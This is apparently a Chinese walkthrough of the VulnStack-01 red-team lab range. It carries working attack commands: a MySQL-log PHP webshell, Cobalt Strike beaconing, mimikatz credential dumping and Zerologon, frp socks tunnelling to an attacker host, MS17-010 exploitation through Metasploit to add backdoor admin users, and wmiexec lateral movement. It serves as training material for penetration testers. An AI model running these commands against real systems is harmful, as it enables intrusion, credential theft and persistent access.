VulnStack-01 ATT&CK 红队评估

  • A+
所属分类:安全文章

靶场信息

地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

发布日期:2019年10月20日 14:05

目标:上线三个管理员权限靶机

标签:  内网渗透 | Kill Chain | 域渗透 | 威胁情报

百度网盘:https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset

密码: 下载密码:n1u2

环境配置

VulnStack-01 ATT&CK 红队评估
image-20210816150309869

1)设置网卡信息

文章中的网卡设置如下

这里共使用了2张网卡,VMnet1和VMnet2,其中VMnet1连接有kali和第一个靶场,说明此网卡用来模拟公网ip,我本地使用NAT的VMnet8来代替,VMnet2内网网卡使用本地的VMnet6代替

VulnStack-01 ATT&CK 红队评估
绘图3

查看第三个靶场的网卡配置

VulnStack-01 ATT&CK 红队评估
image-20210816224207514

查看第三个靶场的网卡配置,需要把我本地的VMnet6设置为

ip地址:192.168.52.1
子网掩码:255.255.255.0
默认网关:192.168.52.2

VMware虚拟网络配置

子网ip:192.168.52.0
子网掩码:255.255.255.0
DHCP
ip范围:192.168.52.3-254
VulnStack-01 ATT&CK 红队评估
image-20210816224611723

三个靶机网卡配置

第一个靶场windows7
双网卡:VMnet8(NAT)+VMnet6
这里需要注意,VMnet6的网卡所在的网络适配器IP是自定义的,NAT是自动获取,不能弄反

第二个靶场win2k3
网卡VMnet6

第三个靶场windows2008
网卡VMnet6

攻击机kali
网卡VMnet8(NAT)

2)win7靶机开启phpstudy

VulnStack-01 ATT&CK 红队评估
image-20210817155537114

3)windows2008开启redis服务

VulnStack-01 ATT&CK 红队评估
image-20210818231550535

一、信息收集

1)确定目标

使用netdiscover扫描10.0.1.0网段存活主机

netdiscover -r 10.0.1.0/24 -i eth0

得到ip地址:10.0.1.5

VulnStack-01 ATT&CK 红队评估**

2)端口扫描

nmap -v -T4 -p- -A -oN nmap.log 10.0.1.5

phpstudy开的80和3306

VulnStack-01 ATT&CK 红队评估
image-20210816230424517

3)访问靶机

http://10.0.1.5

探针里面已经泄露了网站的绝对路径

VulnStack-01 ATT&CK 红队评估
image-20210816230623436

尝试一下,可以访问phpmyadmin,且mysql是弱口令root/root毫无套路

4)上线蚁剑

http://10.0.1.5/phpmyadmin

通过phpstudy开启的服务,使用弱口令连接phpmyadmin

VulnStack-01 ATT&CK 红队评估
image-20210816231520381

写入webshell

show global variables like '%secure_file_priv%';

NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录

这里是NULL,放弃这个into outfile,尝试写日志或者利用yxcms,既然在mysql窝里那就搞mysql吧

VulnStack-01 ATT&CK 红队评估
image-20210816231919421

日志文件写 shell

SHOW VARIABLES LIKE 'general%';
VulnStack-01 ATT&CK 红队评估
image-20210816232940366

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:

# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/ch4nge.php';

# 查看当前配置
SHOW VARIABLES LIKE 'general%';

成功

VulnStack-01 ATT&CK 红队评估
image-20210816233127924
# 往日志里面写入 payload
select '<?php @eval($_POST[miss]);?>';

# 此时已经写到 ch4nge.php 文件当中了
VulnStack-01 ATT&CK 红队评估
image-20210816233243292

蚁剑连接

连上了

VulnStack-01 ATT&CK 红队评估
image-20210816233333885

探测一下发现管理员权限还出网

VulnStack-01 ATT&CK 红队评估
image-20210816233649426

5)补充:yxcms上线蚁剑方法

想搞yxcms可以参考我前面的文章https://www.freebuf.com/articles/web/277572.html

管理员登录需要修改r=admin

yxcms的默认用户名密码是admin/123456

在页面配置中可以修改页面源码,直接加入一句话就ok了。

6)上线CS

kali的ip是10.0.1.12,启动CS服务,建立监听生成远控马,蚁剑传进去执行上线

VulnStack-01 ATT&CK 红队评估
image-20210816234136020

二、内网信息搜集

1)logonpasswords读取密码成功

[email protected]
VulnStack-01 ATT&CK 红队评估
image-20210816234346492

2)系统信息

systeminfo

主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
系统类型:         x64-based PC
域:               god.org
登录服务器:       \OWA
修补程序:         安装了 4 个修补程序。
                  [01]: KB2534111
                  [02]: KB2999226
                  [03]: KB958488
                  [04]: KB976902

3)网卡信息

ipconfig /all

可以看出此靶机存在域中

域名:god.org
双网卡:
net1:10.0.1.5(模拟公网)
net2:192.168.52.143(可以看出这个是内网ip了)
DNS:192.168.52.138
这个DNS大概率是域控god.org的ip
VulnStack-01 ATT&CK 红队评估
image-20210816234602114
VulnStack-01 ATT&CK 红队评估
image-20210816234631555

4)端口服务信息

扫描到的东西好多啊。发现网段内存活的另外两台机器分别是138和141。三台竟然都有ms17010,没啥遗憾的,之前没有找到143这个漏洞是因为这个机器防火墙开了,外面扫不到

shell C:WindowsTempfscan.exe -h 192.168.52.1/24

scan start
(ICMP) Target '192.168.52.138' is alive
(ICMP) Target '192.168.52.141' is alive
(ICMP) Target '192.168.52.143' is alive
icmp alive hosts len is: 3
192.168.52.138:135 open
192.168.52.138:80 open
192.168.52.143:135 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.143:445 open
192.168.52.138:445 open
192.168.52.141:135 open
192.168.52.141:445 open
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]169.254.129.186
   [->]192.168.52.143
   [->]10.0.1.5
NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
192.168.52.141 MS17-010 (Windows Server 2003 3790)
NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
WebTitle:http://192.168.52.138:80 200 None
192.168.52.143:3306 open
192.168.52.141:7001 open
FTP:192.168.52.141:21:ftp admin123A
WebTitle:http://192.168.52.143:80 200 phpStudy 鎺㈤拡 2014 
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]169.254.129.186
   [->]192.168.52.143
   [->]10.0.1.5
WebTitle:http://192.168.52.138:80 200 None
NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
192.168.52.141 MS17-010 (Windows Server 2003 3790)
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
FTP:192.168.52.141:21:ftp admin123A

5)域内机器信息

使用CS的插件上传运行nbtscan进行扫描,或者自己上传nbtscan扫描

VulnStack-01 ATT&CK 红队评估
image-20210818215517732
192.168.52.138  GODOWA                         SHARING DC
192.168.52.141  GODROOT-TVI862UBEH             SHARING ?
192.168.52.143  GODSTU1                        SHARING
VulnStack-01 ATT&CK 红队评估
image-20210818215550571

三、frp打隧道

(1)配置文件

靶机:

# frpc.ini
[common]
server_addr = 10.0.1.12
server_port = 11608
[http_proxy]
type = tcp
remote_port = 11668
plugin = socks5

/PS:

# frps.ini[common]bind_addr = 0.0.0.0bind_port = 11608

先在/PS建立服务端

./frps -c frps.ini
VulnStack-01 ATT&CK 红队评估
image-20210817001401291

然后在靶机开启客户端

shell cd C:WindowsTemp && frpc.exe -c frpc.ini
VulnStack-01 ATT&CK 红队评估
image-20210817002249004

kali回显

VulnStack-01 ATT&CK 红队评估
image-20210817002312187

proxychains设置:

10.0.1.12 11668

连接测试VulnStack-01 ATT&CK 红队评估

经过测试,ftp连接登录后,无法获取目录

VulnStack-01 ATT&CK 红队评估
image-20210817004754233

四、攻击192.168.52.138

1)思路描述

(1)思考1

在攻击过程中我发现没有建立IPC的时候windows7系统的web服务器中可以直接dir列出192.168.52.138和192.168.52.141两台机器的目录,这也是靶机域环境的一个漏洞

VulnStack-01 ATT&CK 红队评估
image-20210818220737043
VulnStack-01 ATT&CK 红队评估
image-20210818220704119

所以,我们可以对CS会话建立192.168.52.143(切记,不能写10.0.1.5)的中转监听,生成这个监听的木马,把马传到141和138的机器,然后使用永恒之蓝运行exe木马就可以上线

copy 64.exe \192.168.52.141c$windowssystem32
copy 64.exe \192.168.52.138c$windowssystem32

(2)思考2

既然存在永恒之蓝漏洞,可以使用永恒之蓝漏洞新建用户并添加到本地administrators组,这里不能建立域用户。提示:建立用户是很容易被发现的~

VulnStack-01 ATT&CK 红队评估
image-20210818223431301
net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add

难用的方法:使用CS的会话建立IPC

net use \192.168.52.138ipc$ "QWEasd123" /user:ch4nge
# 这里发现从域普通用户IPC连接域普通用户,需要域管理员的账号才行,所以想用这个方法渗透到这个普通域用户机器需要在域控那里直接IPC连接(域信任),或者就是好用的方法wmiexec
net use \192.168.52.141ipc$ "QWEasd123" /user:ch4nge

#然后copy马过去,永恒之蓝去执行.永恒之蓝执行命令

好用的方法:通过隧道使用wmiexec连接获取shell,windows版本的wmiexec好用

wmiexec.exe ch4nge:[email protected]

put 32.exe
VulnStack-01 ATT&CK 红队评估
image-20210819004521782

注意192.168.52.141是win2003,是32位系统,木马要生成32位的

VulnStack-01 ATT&CK 红队评估
image-20210819004556704

(3)思考3

哈希置零攻击CVE-2020-1472

上传mimikatz,CS上检测是否存在CVE-2020-1472漏洞,看图显示Authentication: OK -- vulnerable表示存在,可以用这个方式攻击域控。

注意这里的sccount从nbtscan得到

shell mimikatz "lsadump::zerologon /target:192.168.52.138 /account:OWA$" "exit"
VulnStack-01 ATT&CK 红队评估
image-20210818222717067

141这个报错没见过,有师傅知道报错是什么原因导致的吗

VulnStack-01 ATT&CK 红队评估
image-20210818222940630

2)永恒之蓝+wmiexec上线CS

(1)建立中转监听

VulnStack-01 ATT&CK 红队评估
image-20210817005034203

(2)生成32位和64位的木马

64.exe和32.exe

VulnStack-01 ATT&CK 红队评估
image-20210819004815677
VulnStack-01 ATT&CK 红队评估
image-20210819004824797

(3)msfconsole设置代理

setg Proxies socks5:10.0.1.12:11668
setg ReverseAllowProxy true
VulnStack-01 ATT&CK 红队评估
image-20210818220154657

(4)使用ms17-010模块进行攻击

msf6 > search ms17-010
msf6 > use 0
VulnStack-01 ATT&CK 红队评估
image-20210818220254292
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND ipconfig
COMMAND => ipconfig
msf6 auxiliary(admin/smb/ms17_010_command) > run
VulnStack-01 ATT&CK 红队评估
image-20210818220502516

创建管理员组用户

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge
VulnStack-01 ATT&CK 红队评估
image-20210818233503646
VulnStack-01 ATT&CK 红队评估
image-20210818233539854
VulnStack-01 ATT&CK 红队评估
image-20210818233610709

(5)192.168.52.141建立管理员组用户

net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge
VulnStack-01 ATT&CK 红队评估
image-20210818234502256
VulnStack-01 ATT&CK 红队评估
image-20210818234548125
VulnStack-01 ATT&CK 红队评估
image-20210818234638222

(6)建立IPC

然后使用CS的会话建立IPC

net use \192.168.52.138ipc$ "QWEasd123" /user:ch4nge
net use \192.168.52.141ipc$ "QWEasd123" /user:ch4nge

删除IPC方法
net use \192.168.52.141 /del /y
VulnStack-01 ATT&CK 红队评估
image-20210818234838829

192.168.52.141建立IPC成功,但是不能使用dir列C盘目录,使用域管理员用户才有权限,好家伙,先上线域控再说

copy马过去,永恒之蓝去执行.永恒之蓝执行命令的当前路径是C:windowssystem32

直接copy到这个路径

copy 64.exe \192.168.52.138c$windowssystem32
VulnStack-01 ATT&CK 红队评估
image-20210819001353398

执行木马,上线CS

msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 64.exe
COMMAND => 64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > run
VulnStack-01 ATT&CK 红队评估
image-20210819001515464

(7)通过隧道使用wmiexec连接获取shell

windows版本的wmiexec好用

当然啦,域控也可以这样上线

wmiexec.exe ch4nge:[email protected]

put 32.exe
VulnStack-01 ATT&CK 红队评估
image-20210819004521782

注意192.168.52.141是win2003,是32位系统,木马要生成32位的

VulnStack-01 ATT&CK 红队评估
image-20210819004556704
VulnStack-01 ATT&CK 红队评估
image-20210819005346701

总结

在打此靶场遇到一些问题总结如下

1.靶机中的域信任关系,域控可以直接dir 该域普通用户

2.域普通用户A对域普通用户B进行IPC的时候,要用B的域管理员用户才可以,本地管理员用户不可以;wmiexec使用B的本地用户和域管理员用户都可以连接

3.用wmiexec连接已知密码的靶机

本文始发于微信公众号(灼剑安全团队):VulnStack-01 ATT&CK 红队评估

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: